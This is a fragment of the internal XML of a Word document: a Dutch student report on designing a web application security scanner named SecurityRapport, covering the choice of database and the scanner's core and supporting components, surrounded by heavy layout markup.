                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3295227</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="499" name="Rectangle 49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91E4" id="Rectangle 499" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.2pt;margin-top:-259.4pt;width:25pt;height:1031.7pt;z-index:-2511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HJp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S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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00607C53">
        <w:t>Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E13070" w14:textId="0A5FFEF9" w:rsidR="00282023" w:rsidRDefault="00D7147C">
      <w:r>
        <w:t>Het kiezen van een web framework is een belangrijke stap richt</w:t>
      </w:r>
      <w:r w:rsidR="00A25BCF">
        <w:t>ing het ontwikkelen van een web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">applicatie </w:t>
      </w:r>
      <w:r w:rsidR="005B7D24">
        <w:t>een bijna zo even belangrijk</w:t>
      </w:r>
      <w:r w:rsidR="00BC2FA5">
        <w:t xml:space="preserv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pplicatie, iets wat een </w:t>
      </w:r>
      <w:r w:rsidR="00FC7F0C">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>eb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w:t>
      </w:r>
      <w:r w:rsidR="000F5EEA">
        <w:t xml:space="preserve"> en dat</w:t>
      </w:r>
      <w:r w:rsidR="00160631">
        <w:t xml:space="preserve"> in een rap tempo.</w:t>
      </w:r>
      <w:r w:rsidR="009605E9">
        <w:t xml:space="preserve"> Maar niet alleen </w:t>
      </w:r>
      <w:r w:rsidR="00D529FF">
        <w:t>tijdens een scan kunnen er duizenden aanvallen uitgevoerd worden, de data hiervan zal ook moeten worden opgeslage</w:t>
      </w:r>
      <w:r w:rsidR="008D658B">
        <w:t xml:space="preserve">n. Kortom een DBMS is een zeer cruciaal component van het gehele systeem. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B8DB97" w14:textId="2EEE3996"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SQL wordt al meer dan 4 decennia in de professionele werkveld gebruikt en het ge</w:t>
      </w:r>
      <w:r w:rsidR="003246CC">
        <w:t>bruik is in de jaren negentig</w:t>
      </w:r>
      <w:r w:rsidR="00D2621A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D2621A" w:rsidRPr="00D2621A">
        <w:t>exponentieel</w:t>
      </w:r>
      <w:r w:rsidR="00FF26BC">
        <w:t xml:space="preserve"> gestegen me</w:t>
      </w:r>
      <w:r w:rsidR="00546C9B">
        <w:t>t de komst van web</w:t>
      </w:r>
      <w:r w:rsidR="00753D20">
        <w:t>applicaties en open source optie als MySQL en SQLite.</w:t>
      </w:r>
      <w:r w:rsidR="00DE20AF">
        <w:t xml:space="preserve"> NOSQL </w:t>
      </w:r>
      <w:r w:rsidR="00173DC0">
        <w:t>daarentegen</w:t>
      </w:r>
      <w:r w:rsidR="009E11D4">
        <w:t xml:space="preserve"> bestaat</w:t>
      </w:r>
      <w:r w:rsidR="00DE20AF">
        <w:t xml:space="preserve"> al s</w:t>
      </w:r>
      <w:r w:rsidR="000636F5">
        <w:t>inds de jaren zestig</w:t>
      </w:r>
      <w:r w:rsidR="005D53A2">
        <w:t xml:space="preserve"> maar</w:t>
      </w:r>
      <w:r w:rsidR="0055408A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005D53A2">
        <w:t xml:space="preserve">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650BF0">
        <w:t>Web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6FC793C6" w14:textId="04876620" w:rsidR="004A26CE" w:rsidRDefault="00672B40">
      <w:pPr>
        <w:sectPr w:rsidR="004A26CE" w:rsidSect="004D5383">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>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00BF30D9" w:rsidR="002A05E5" w:rsidRPr="001C726A" w:rsidRDefault="002A05E5" w:rsidP="00A435BE">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur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4"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ACnPTSOAIAAGwEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAlM/hW4gAAAAoBAAAPAAAA&#10;AAAAAAAAAAAAAJAEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4E20C143" w14:textId="00BF30D9" w:rsidR="002A05E5" w:rsidRPr="001C726A" w:rsidRDefault="002A05E5" w:rsidP="00A435BE">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 3.9</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41">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w:t>
      </w:r>
      <w:r w:rsidR="006D4BC2">
        <w:t>ste gevallen geschreven in JSON-</w:t>
      </w:r>
      <w:r w:rsidR="004D04F3">
        <w:t xml:space="preserve">annotatie. </w:t>
      </w:r>
      <w:r w:rsidR="00514CCE">
        <w:t>NOSQL is bedoeld</w:t>
      </w:r>
      <w:r w:rsidR="00F01113">
        <w:t xml:space="preserve">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p>
    <w:p w14:paraId="12A5271B" w14:textId="524070BD" w:rsidR="004A26CE" w:rsidRDefault="0096760D" w:rsidP="00435E58">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1180"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252244992" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57A9D679" wp14:editId="2C5327EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-599988</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7557135" cy="10746740"/>
                <wp:effectExtent l="0" t="0" r="12065" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="566" name="Rectangle 566"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7557135" cy="10746740"/>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A1D0E" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="004A26CE"/>
                          <w:p w14:paraId="2FD96CDE" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="004A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D679" id="Rectangle 566" o:spid="_x0000_s1055" style="position:absolute;left:0;text-align:left;margin-left:-71pt;margin-top:-47.2pt;width:595.05pt;height:846.2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" fillcolor="#ffd966" stroked="f" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="271A1D0E" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="004A26CE"/>
                    <w:p w14:paraId="2FD96CDE" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="004A26CE">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252350464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EAE82BF" wp14:editId="0D31EB43">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-325755</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>83820</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3556635" cy="630555"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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0">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tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D55A7F" w14:textId="4CF3B98D" w:rsidR="004A26CE" w:rsidRPr="004A26CE" w:rsidRDefault="0096760D" w:rsidP="00435E58">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1180"/>
        </w:tabs>
        <w:sectPr w:rsidR="004A26CE" w:rsidRPr="004A26CE" w:rsidSect="0096760D">
          <w:headerReference w:type="first" r:id="rId42"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252341248" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7796FF14" wp14:editId="139DF447">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-398145</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2635250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5969635" cy="1483360"/>
                <wp:effectExtent l="0" t="0" r="24765" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="130" name="Rounded Rectangle 130"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5969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7F4B3" id="Rounded Rectangle 130" o:spid="_x0000_s1026" style="position:absolute;margin-left:-31.35pt;margin-top:207.5pt;width:470.05pt;height:116.8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" filled="f" strokecolor="white [3212]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252254208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D8305E0" wp14:editId="37780D2B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-271780</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2863850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842635" cy="10280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65D94A9" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00CA4BC9" w:rsidRDefault="002A05E5" w:rsidP="0067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05E0" id="Text Box 195" o:spid="_x0000_s1056" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-21.4pt;margin-top:225.5pt;width:460.05pt;height:80.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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="065D94A9" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00CA4BC9" w:rsidRDefault="002A05E5" w:rsidP="006705F1"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252256256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4825A146" wp14:editId="6433EF81">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-389255</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1146175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2477135" cy="68834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477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C2EDC" w14:textId="7E5CBA09" w:rsidR="002A05E5" w:rsidRPr="00A14BEE" w:rsidRDefault="002A05E5">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A146" id="Text Box 197" o:spid="_x0000_s1057" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-30.65pt;margin-top:90.25pt;width:195.05pt;height:54.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="787C2EDC" w14:textId="7E5CBA09" w:rsidR="002A05E5" w:rsidRPr="00A14BEE" w:rsidRDefault="002A05E5">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00435E58">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2FB79F" w14:textId="77777777" w:rsidR="0096760D" w:rsidRDefault="0096760D" w:rsidP="0036186A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C724CF" w14:textId="674B0C4D" w:rsidR="00F35D5A" w:rsidRPr="005F0F15" w:rsidRDefault="006F5AC4" w:rsidP="0036186A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252175360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B3FB455" wp14:editId="563D13D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-914259</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-2963616</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="501" name="Rectangle 5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93796" id="Rectangle 501" o:spid="_x0000_s1026" style="position:absolute;margin-left:-1in;margin-top:-233.3pt;width:25pt;height:1031.7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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0026508E" w:rsidRPr="0026508E">
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidR="00940598" w:rsidRPr="0026508E">
        <w:t>Concept ontwikkeling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E8961C" w14:textId="4C165841" w:rsidR="00F35D5A" w:rsidRPr="00AD1E97" w:rsidRDefault="00AD1E97" w:rsidP="00AD1E97">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Introductie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3ED8D" w14:textId="1D1E44D4"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w:t>
      </w:r>
      <w:r w:rsidR="009F5F17">
        <w:t xml:space="preserve">het </w:t>
      </w:r>
      <w:r w:rsidR="00936BE2">
        <w:t>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en van het systeem beschrijven.</w:t>
      </w:r>
      <w:r w:rsidR="00132A0C">
        <w:t xml:space="preserve"> Vanaf</w:t>
      </w:r>
      <w:r w:rsidR="008761E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00933758">
        <w:t>dit punt zal ik naast he</w:t>
      </w:r>
      <w:r w:rsidR="002519E2">
        <w:t>t woord softwaresysteem</w:t>
      </w:r>
      <w:r w:rsidR="00933758">
        <w:t xml:space="preserve"> ook de naam SecurityRapport gebruiken om </w:t>
      </w:r>
      <w:r w:rsidR="002519E2">
        <w:t>naar het softwaresysteem te refereren.</w:t>
      </w:r>
      <w:r w:rsidR="00356252" w:rsidRPr="00356252">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4C5383" w14:textId="200C9962" w:rsidR="00432A1D" w:rsidRPr="008E193D" w:rsidRDefault="00E9695F" w:rsidP="003F524C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E193D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Concepten die behandeld worden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A7596" w14:textId="3C59A997" w:rsidR="004C172B" w:rsidRPr="00A73D87" w:rsidRDefault="009955BC">
      <w:r>
        <w:t xml:space="preserve">Het systeem bestaat uit kern componenten en ondersteunende componenten. </w:t>
      </w:r>
      <w:r w:rsidR="003C6ED2">
        <w:t>Ik zal mij in dit deel primaire focussen op de kern componenten, zo kan ik de rol</w:t>
      </w:r>
      <w:r w:rsidR="00BF1D04">
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidR="003C6ED2">
        <w:t xml:space="preserve">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5E415C" w:rsidRPr="005E415C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E21A84" w14:textId="48FCE81B" w:rsidR="007B3DF4" w:rsidRPr="004C172B" w:rsidRDefault="0089781B">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00F6756D" w:rsidRPr="00F6756D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>omponenten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3693E396" w14:textId="436D9F40" w:rsidR="001E02BB" w:rsidRDefault="00190A53">
      <w:r>
        <w:t xml:space="preserve">De kern componenten zoals deze in WASC </w:t>
      </w:r>
      <w:r w:rsidR="001D5B79">
        <w:t>WASSEC document</w:t>
      </w:r>
      <w:r w:rsidR="00C438E6">
        <w:t xml:space="preserve"> aangegeven zijn,</w:t>
      </w:r>
      <w:r w:rsidR="001D5B79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006544E3">
        <w:t>geven een overzicht van de onderdelen waar een webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="001F685D">
        <w:t xml:space="preserve"> scanner</w:t>
      </w:r>
      <w:r w:rsidR="006544E3">
        <w:t xml:space="preserve"> minimaal uit moet bestaan.</w:t>
      </w:r>
      <w:r w:rsidR="00CB5D05">
        <w:t xml:space="preserve"> Kern componenten zijn essentieel voor de werking van de applicatie</w:t>
      </w:r>
      <w:r w:rsidR="009918A1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000D698A" w:rsidRPr="000D698A">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259842D5" w14:textId="5E764466" w:rsidR="008A5336" w:rsidRDefault="008A5336" w:rsidP="008A5336">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D33A6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ondersteunende componenten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F17E93" w14:textId="77777777" w:rsidR="00D03138" w:rsidRDefault="00D03138" w:rsidP="008A5336">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252351488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51402C40" wp14:editId="720F67A0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-6985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>757555</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6028690" cy="3995420"/>
                <wp:effectExtent l="0" t="0" r="16510" b="17780"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21559"/>
                    <wp:lineTo x="21568" y="21559"/>
                    <wp:lineTo x="21568"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6028690" cy="3995420"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFD966"/>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D105" id="Rectangle 31" o:spid="_x0000_s1026" style="position:absolute;margin-left:-.55pt;margin-top:59.65pt;width:474.7pt;height:314.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" fillcolor="#ffd966" strokecolor="#bf8f00 [2407]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E2642C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252774400" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5147696C" wp14:editId="595BBB5F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1833245</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3153410</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="692785" cy="572770"/>
            <wp:effectExtent l="0" t="0" r="0" b="1143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2785" cy="572770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E2642C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252768256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="470632B9" wp14:editId="061942D7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3038475</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3157855</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="636905" cy="636905"/>
            <wp:effectExtent l="0" t="0" r="0" b="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page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E2642C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252383232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A9AD935" wp14:editId="22883F5F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2909570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3844925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="895350" cy="674370"/>
                <wp:effectExtent l="0" t="0" r="0" b="11430"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="479" name="Text Box 479"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="89535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73E4F7" w14:textId="50BFEF72" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5" w:rsidP="005776D0">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="008F7930">
                              <w:t>Admin</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidRPr="008F7930">
                              <w:t>Pan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D935" id="Text Box 479" o:spid="_x0000_s1058" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:229.1pt;margin-top:302.75pt;width:70.5pt;height:53.1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lK+XsCAABk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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0173E4F7" w14:textId="50BFEF72" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5" w:rsidP="005776D0">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="008F7930">
                        <w:t>Admin</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="008F7930">
                        <w:t>Paneel</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F05BDD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252758016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6AFA6C50" wp14:editId="59579CDC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>495300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1329055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="819150" cy="773430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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19150" cy="773430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="007C505C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
